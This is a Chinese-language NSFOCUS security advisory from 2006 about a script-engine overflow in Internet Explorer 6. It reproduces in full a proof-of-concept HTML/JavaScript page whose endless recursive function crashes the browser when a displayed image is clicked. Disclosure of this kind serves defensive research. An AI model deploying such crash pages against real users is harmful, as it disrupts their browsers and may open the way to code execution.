安全研究

安全漏洞
Microsoft Internet Explorer脚本引擎溢出漏洞

发布日期:2006-02-16
更新日期:2006-02-17

受影响系统:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
描述:
BUGTRAQ  ID: 16687

Microsoft Internet Explorer是非常流行的WEB浏览器。

Internet Explorer VBScript和JScript引擎中存在远程溢出漏洞,可能导致浏览器失效。也可能导致代码执行,但未经证实。

<*来源:porkythepig (porkythepig@anspi.pl
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<head>
<title>IExploiter</title>
<script language="JavaScript">

var xcnt=0;
var va;
var xsiz=400;
var xoffs=10;
var yoffs=5;

function f14()
{
    alert("asdasd");
}

function f50(command,args)
{

    
    xw=(document.body.clientWidth-xsiz)/2;
    va=window.open("","aa","height=50,width="+xsiz+",status=no,toolbar=no,menubar=no,top="+600+",left="+xw);
    va.document.writeln("<body bgcolor=#0 text=#858585>");
    va.document.writeln("<FORM NAME=\"myForm\" > </FORM>");
    va.document.writeln("<FORM NAME=\"f117nighthawk\" > </FORM>");
    var lnk11=va.document.all.item("myForm");
    lnk11.style.position="absolute";
    lnk11.style.left=10+xoffs;
    lnk11.style.top=30+yoffs;
    lnk11.style.color=0x858585;
    lnk11.style.fontfamily="Arial";
    lnk11.style.fontSize="10pt";
    lnk11.innerText="Call stack recurrency nesting level: ";

    var lnk11=va.document.all.item("f117nighthawk");
    lnk11.style.position="absolute";
    lnk11.style.left=220+xoffs;
    lnk11.style.color=0x800000;
    lnk11.style.fontfamily="Arial";
    lnk11.style.fontSize="20pt";
    lnk11.innerText="1";

    lnk11.style.top=30-12+yoffs;


    f2();
}

function f2()
{
    if(!va.closed)
    {
        var lnk11=va.document.all.item("f117nighthawk");
        xcnt=xcnt+1;
        lnk11.innerText=xcnt;
        eval("location='http://www.microsoft.com'");
    }
    else
    {
        eval("location='http://www.google.com'");
    }

    f2();
//    alert("asdasd");
}


function ld()
{
    if(navigator.appName!="Microsoft Internet Explorer")
    {
        alert("Sorry Bro, only flammable stuff beyond this point,\nInternet Explorer needed to crash properly.");
    }
    else
    {
    var as1=document.all.item("g1");
    as1.style.visibility="visible";
    as1.style.position="absolute";

    var lft1=(document.body.clientWidth-as1.width)/2;
    var top1=(document.body.clientHeight-as1.height)/2;
    var mainw=as1.width;
    as1.style.left=lft1;
    as1.style.top=top1;
    as1.style.cursor="hand";
    as1.style.backgroundImage="";

    var as1=document.all.item("g2");
    as1.style.visibility="visible";
    as1.style.position="absolute";
    as1.style.left=lft1-as1.width;
    as1.style.top=top1+250;

    var as1=document.all.item("g3");
    as1.style.visibility="visible";
    as1.style.position="absolute";
    var lft=(document.body.clientWidth-as1.width)/2;
    as1.style.left=lft1+mainw;
    as1.style.top=top1+200;
    }
    
}

</script>
</head>

<body bgcolor="#000010" onload="ld()" onresize="ld()" style="overflow:hidden">
<IMG NAME="g1" style="visibility:hidden" SRC="Mila6324exploited.jpg" onclick="f50()">
<IMG NAME="g2" style="visibility:hidden" SRC="Image2.gif">
<IMG NAME="g3" style="visibility:hidden" SRC="Image5.gif">
</body>
</html>

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:4124
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障